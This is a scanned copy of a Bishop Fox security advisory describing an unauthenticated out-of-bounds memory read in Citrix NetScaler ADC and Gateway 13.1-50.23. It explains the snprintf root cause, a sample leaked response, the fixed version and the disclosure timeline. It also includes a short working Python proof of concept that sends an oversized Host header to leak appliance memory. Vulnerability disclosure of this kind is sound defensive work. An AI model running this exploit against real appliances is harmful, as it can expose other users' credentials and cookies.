bishopfox.com
Open in
urlscan Pro
2606:4700:20::6818:362
Public Scan
URL:
https://bishopfox.com/blog/netscaler-adc-and-gateway-advisory
Submission: On May 07 via api from TR — Scanned from DE
Submission: On May 07 via api from TR — Scanned from DE
Form analysis 2 forms found in the DOM
<form id="mktoForm_1049" __bizdiag="196351718" __biza="W___" novalidate="novalidate" style="font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); width: 1601px;" class="mktoForm mktoHasWidth mktoLayoutLeft" digitalpi-utms-added="true">
<style type="text/css"></style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>Email Address:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="Email" name="Email" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email" class="mktoField mktoEmailField mktoHasWidth mktoRequired"
aria-required="true" style="width: 320px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative" style="margin-left: 110px;"><button type="submit" class="mktoButton">Submit</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="1049"><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="136-UTJ-516"><input type="hidden" name="Utm_Orig_Medium__c" class="mktoField mktoFieldDescriptor" value="none"><input type="hidden"
name="Utm_Orig_Source__c" class="mktoField mktoFieldDescriptor" value="none">
</form><form __bizdiag="-156876159" __biza="W___" novalidate="novalidate" style="font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"
class="mktoForm mktoHasWidth mktoLayoutLeft"></form>Text Content
Bishop Fox named “Leader” in 2024 GigaOm Radar for Attack Surface Management.
Read the Report ›
Cosmos
Services
Resources
Customers
Partners
About Us
Get Started
Introducing Cosmos
NAMED LEADER OF THE GIGAOM RADAR FOR THE THIRD YEAR IN A ROW!
Request A Demo
Cosmos Overview
Meet Cosmos: The continuous offensive security solution designed to provide
proactive defense.
Cosmos Attack Surface Management
Get Cosmos Attack Surface Management (CASM) for unmatched visibility into your
changing external attack surface with continuous discovery and mapping.
Cosmos Application Penetration Testing
Cosmos Application Penetration Testing (CAPT) strengthens the security of
business-critical applications with in-depth assessments.
Cosmos External Penetration Testing
Cosmos External Penetration Testing (CEPT) builds on Cosmos Attack Surface
Management to provide the highest level of attack surface protection with
post-exploitation activities.
The Best Defense is a Great Offense
SEE WHY WE'RE THE LEADERS IN OFFENSIVE SECURITY
Explore Services
Application Security
Ensure your applications are secure and improve your DevSecOps practices.
* Application Pen Testing
* Hybrid App Assessment
* Mobile App Assessment
* View More
Red Team & Readiness
Get a holistic view of your ability to defend against a real-world attack.
* Social Engineering
* Incident Response Tabletop Exercise
* Ransomware Readiness
IoT & Product Security
Validate interconnected devices and products are secure against attackers.
Cloud Security
Assess cloud security posture with expert testing and analysis of your
environment.
Network Security
Get insight into how skilled adversaries could establish network access and put
sensitive systems and data at risk.
* External Pen Testing
* Internal Pen Testing
* Continuous Attack Surface Testing
AI/ML Security Assessment
Fortify the security of rapidly evolving AI/ML applications, models, and
supporting infrastructures.
Compliance, Regulations, & Frameworks
Satisfy governance, risk, and compliance programs with our testing services.
Assessments for Our Partners
We're proud to work with Google, Facebook, and Amazon to increase security in
their partner ecosystems.
* Cloud App Security Assessments (CASA)
* Meta Workplace Assessments
* Amazon Alexa Assessments
* View More
A Ponemon Institute Report
THE STATE OF OFFENSIVE SECURITY
Get the blueprint. Insights into how mature security organizations invest in
offensive strategies.
Get the Report
Resource Center
Discover new offensive security resources, ranging from reports and eBooks to
slide decks from speaking gigs.
* Webcasts
* Reports
* eBooks & Guides
* Cybersecurity Style Guide
* View All
Bulletins & Advisories
Explore the latest security bulletins and advisories released by our team.
* Exploit for Fortinet CVE-2022-42475
Latest
* View All
Blog
Dive into our blog for insights and perspectives from our offensive security
experts.
* Industry
* Technology
Bishop Fox Labs
Learn more about our research and some of the most popular open-source security
tools. Check them out here!
* Hacking Tools
* Training Sessions
Why Partner with Us?
JOIN FORCES WITH THE LEADERS IN OFFENSIVE SECURITY
Independent Assessment by TAG Cyber
Get the Report
Partner Program Overview
Learn about our partner programs and see how we can work together to provide
best-in-class security offerings.
Find a Partner
Check out our awesome ecosystem of trusted partners to find the right solution
for your needs.
Become a Partner
Explore partnership opportunities and apply to join forces with Bishop Fox.
Assessments for Our Partners
We're proud to work with Google, Facebook, and Amazon to increase the security
of their partner ecosystems.
* Cloud Application Security Assessments
* Mobile Application Security Assessment
* Nest Assessments
* Meta Workplace Assessments
* Amazon Alexa Assessments
We're Hiring!
WANT TO WORK WITH THE BEST MINDS IN OFFENSIVE SECURITY?
Be part of an elite team and work on projects that have a real impact.
Explore Openings
Company Overview
Get to know us. Learn about our roots and see why we're on a mission to improve
security for all.
Events
Join us at an upcoming event or peruse our speaking engagements, past and
present.
Newsroom
Read the latest articles, announcements, and press releases from Bishop Fox.
Contact Us
Want to get in touch? We're ready to connect.
Career Opportunities
We're hiring! Explore our open positions and discover why the Fox Den is a great
place to build your career.
Intern & Educational Programs
Starting your offensive security journey? Check out our internships and
educational programs.
Bishop Fox Mexico
¡Celebramos! Bishop Fox is now in Mexico. Learn more about our expansion.
Cosmos
* Overview
* Cosmos Overview
* Cosmos Attack Surface Management
* Cosmos Application Penetration Testing
* Cosmos External Penetration Testing
Services
* Overview
* Application Security
* Red Team & Readiness
* IoT & Product Security
* Cloud Security
* Network Security
* AI/ML Security Assessment
* Compliance, Regulations, & Frameworks
* Assessments for Our Partners
Resources
* Overview
* Resource Center
* Bulletins & Advisories
* Blog
* Bishop Fox Labs
Customers
Partners
* Overview
* Partner Program Overview
* Find a Partner
* Become a Partner
* Assessments for Our Partners
About Us
* Overview
* Company Overview
* Events
* Newsroom
* Contact Us
* Career Opportunities
* Intern & Educational Programs
* Bishop Fox Mexico
Get Started
Blog // Advisories // May 06, 2024
NETSCALER ADC AND GATEWAY, VERSION 13.1-50.23
By: Bishop Fox, Security Experts
Share
PRODUCT VENDOR
Cloud Software Group
PRODUCT DESCRIPTION
The affected Citrix NetScaler components are used for Authentication,
Authorization, and Auditing (AAA), and remote access. The latest version of
NetScaler is 14.1-21.15, released on April 23, 2024.
VULNERABILITIES LIST
One vulnerability was identified within Citrix Netscaler ADC and Gateway:
* Out-Of-Bounds Memory Read
These vulnerabilities are described in the following sections.
AFFECTED VERSION
Version 13.1-50.23
SUMMARY OF FINDINGS
The vulnerability would enable an attacker to remotely obtain sensitive
information from a NetScaler appliance configured as a Gateway or AAA virtual
server via a very commonly connected Web interface, and without requiring
authentication. This bug is nearly identical to the Citrix Bleed vulnerability
(CVE-2023-4966), except it is less likely to return highly sensitive information
to an attacker.
IMPACT
The vulnerability allows an attacker to recover potentially sensitive data from
memory. Although in most cases nothing of value is returned, we have observed
instances where POST request bodies are leaked. These POST requests may contain
credentials or cookies.
SOLUTION
Update to version 13.1-51.15 or later
OUT-OF-BOUNDS MEMORY READ
Netscaler ADC and Gateway products were vulnerable to an unauthenticated
out-of-bounds memory read which could be exploited to capture sensitive
information from the appliances process memory, including HTTP request bodies.
VULNERABILITY DETAILS
CVE ID: None
Vulnerability Type: Out-Of-Bounds Read
Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if
other, please specify)
Impact: ☐ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒
Information disclosure, ☐ Other (if other, please specify)
Security Risk: ☐ Critical, ☒ High, ☐ Medium, ☐ Low
Vulnerability: CWE-125 (Out-Of-Bounds Read)
Bishop Fox staff determined that NetScaler ADC and Gateway products were
vulnerable to an unauthenticated out-of-bounds memory read and exploited the
vulnerability to capture sensitive information from the appliance’s process
memory, including HTTP request bodies. This could potentially allow attackers to
obtain credentials submitted by users logging in to NetScaler ADC and Gateway
appliances, or cryptographic material used by the appliance.
Bishop Fox staff determined that the Gateway or AAA virtual server performs
unsafe handling of the HTTP Host request header when handling HTTP GET requests
for the /nf/auth/startwebview.do URI. The vulnerable function attempts to
calculate the length of a string containing the Host header and then direct a
subsequent function to copy a string of that length to an HTTP response message.
However, incorrect use of the C snprintf method results in the length exceeding
the size of the source buffer and causing unrelated data to be copied to the
response if the Host header value submitted in the request is longer than
approximately 5,394 bytes. Authentication is not required to exploit this
vulnerability.
The following Python proof-of-concept code can be used to demonstrate
exploitability when executed against a vulnerable appliance:
import requests
url = "https://<HOST>/nf/auth/startwebview.do"
r = requests.get(url, headers={"Host":"A"*0x5000}, verify=False)
print(r.content[0x1800:])
Figure 1 – Proof-of-concept exploit code
More specifically, requests to the /nf/auth/startwebview.do URI are handled by
the ns_aaa_start_webview_for_authv3 function. The
ns_aaa_start_webview_for_authv3 function constructs an XML response using the
snprintf function and returns this response to the user by calling the
ns_vpn_send_response function, as shown below:
sprintf(print_temp_rule,"%s%.*s%s",proto,iVar5 - (int)host_hdr,host_hdr,
"/nf/auth/doWebview.do");
length = snprintf(&ns_HttpRedirectPkt,0x1800,
"<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><AuthenticateRespo nse xmlns=\"http://citrix.com/authentication/response/1\"><Status>success</Statu s><Result>more-info</Result><StateContext></StateContext><AuthenticationRequirem ents><PostBack>/nf/auth/webview/done</PostBack><CancelPostBack>/nf/auth/doLogoff .do</CancelPostBack><CancelButtonText>Cancel</CancelButtonText><Requirements><Re quirement><Credential><ID>samlResponse</ID><Type>webview</Type><wv:WebView xmlns :wv=\"http://citrix.com/authentication/response/webview/1\"><wv:StartUrl>%.*s</w v:StartUrl></wv:WebView></Credential><Label><Type>none</Type></Label><Input/></R equirement></Requirements></AuthenticationRequirements></AuthenticateResponse>"
,length,print_temp_rule);
ns_vpn_send_response(lVar1,0x980200,&ns_HttpRedirectPkt,length);
Figure 2 – Excerpt of decompiled ns_aaa_start_webview_for_authv3 function
The ns_vpn_send_response function sends an HTTP response where the body and size
of the body are provided as parameters. In the code shown above, the size is set
to the return value from the snprintf function. According to the documentation
for the snprintf function, the return value is the number of characters that
would have been written if enough space had been available. Therefore, if the
constructed response would have exceeded the buffer size (0x1800 bytes in this
case), the ns_vpn_send_response function will respond with extra data past the
end of the buffer. This is identical to the underlying cause of CVE-2023-4966
(CitrixBleed).
The unsafe use of the sprintf function in the ns_aaa_start_webview_for_authv3
function is discussed in more detail in the Insecure String Handling finding of
this report.
Bishop Fox staff analyzed vulnerable Citrix deployments and observed instances
where the disclosed memory contained data from HTTP requests, sometimes
including POST request bodies. For example, the response below includes data
from another HTTP request processed by the appliance, apparently related to a
Nessus vulnerability scan:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<AuthenticateResponse xmlns="http://citrix.com/authentication/response/1">
<Status>success</Status>
<Result>more-info</Result>
<StateContext></StateContext>
<AuthenticationRequirements>
<PostBack>/nf/auth/webview/done</PostBack>
<CancelPostBack>/nf/auth/doLogoff.do</CancelPostBack>
<CancelButtonText>Cancel</CancelButtonText>
<Requirements>
<Requirement>
<Credential>
<ID>samlResponse</ID>
<Type>webview</Type>
<wv:WebView xmlns:wv="http://citrix.com/authentication/response/webview/1">
<wv:StartUrl>https:// ...omitted for brevity...
Figure 3 – NetScaler appliance response disclosing memory content
HTTP requests often contain sensitive information that could benefit an
attacker, such as administrators’ credentials.
AFFECTED LOCATIONS
URI
/nf/auth/startwebview.do
Function
ns_aaa_start_webview_for_authv3 in /netscaler/nsppe
CREDITS
* Capability Development Group at Bishop Fox
TIMELINE
* 01/22/2024: Initial discovery
* 01/25/2024: Contact with vendor
* 02/01/2024: Vendor acknowledged vulnerabilities
* 02/02/2024: Vendor confirmed that the latest version (13.1-51.15) was
unaffected
* 05/06/2024: Vulnerabilities publicly disclosed
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
*
Email Address:
Submit
Thank You! You have been subscribed.
--------------------------------------------------------------------------------
About the author, Bishop Fox
Security Experts
Due to the nature in which we conduct research and penetration tests, some of
our security experts prefer to rename anonymous. Their work is published under
our Bishop Fox name.
Bishop Fox is the leading authority in offensive security, providing solutions
ranging from continuous penetration testing, red teaming, and attack surface
management to product, cloud, and application security assessments. We’ve worked
with more than 25% of the Fortune 100, half of the Fortune 10, eight of the top
10 global technology companies, and all of the top global media companies to
improve their security. Our Cosmos platform, service innovation, and culture of
excellence continue to gather accolades from industry award programs including
Fast Company, Inc., SC Media, and others, and our offerings are consistently
ranked as “world class” in customer experience surveys. We’ve been actively
contributing to and supporting the security community for almost two decades and
have published more than 16 open-source tools and 50 security advisories in the
last five years. Learn more at bishopfox.com or follow us on Twitter.
More by Bishop
RECOMMENDED POSTS
YOU MIGHT BE INTERESTED IN THESE RELATED POSTS.
Nov 27, 2023
Ray, Versions 2.6.3, 2.8.0
Jun 20, 2023
TaskCafe, Version 0.3.2 Advisory
Apr 13, 2023
WP Coder, Version 2.5.3 Advisory
Apr 04, 2023
Microsoft Intune, Version 1.55.48.0 Advisory
* Cosmos Platform
* Cosmos Attack Surface Management
* Cosmos Application Penetration Testing
* Cosmos External Penetration Testing
* Services
* Application Security
* Cloud Security
* IoT & Product Security
* Network Security
* Red Team & Readiness
* Compliance, Regulations, & Frameworks
* Google, Facebook, & Amazon Partner Assessments
* Resources
* Resource Center
* Blog
* Advisories
* Tools
* Our Customers
* Our Customer Stories
* Partners
* Partner Programs
* Partner Directory
* Become a Partner
* Company
* About Us
* Careers
We're Hiring
* Events
* Newsroom
* Bishop Fox Mexico
* Bishop Fox Labs
* Contact Us
Copyright © 2024 Bishop Fox
Privacy Statement Responsible Disclosure Policy
This site uses cookies to provide you with a great user experience. By
continuing to use our website, you consent to the use of cookies. To find out
more about the cookies we use, please see our Privacy Policy.
Accept
Live Chat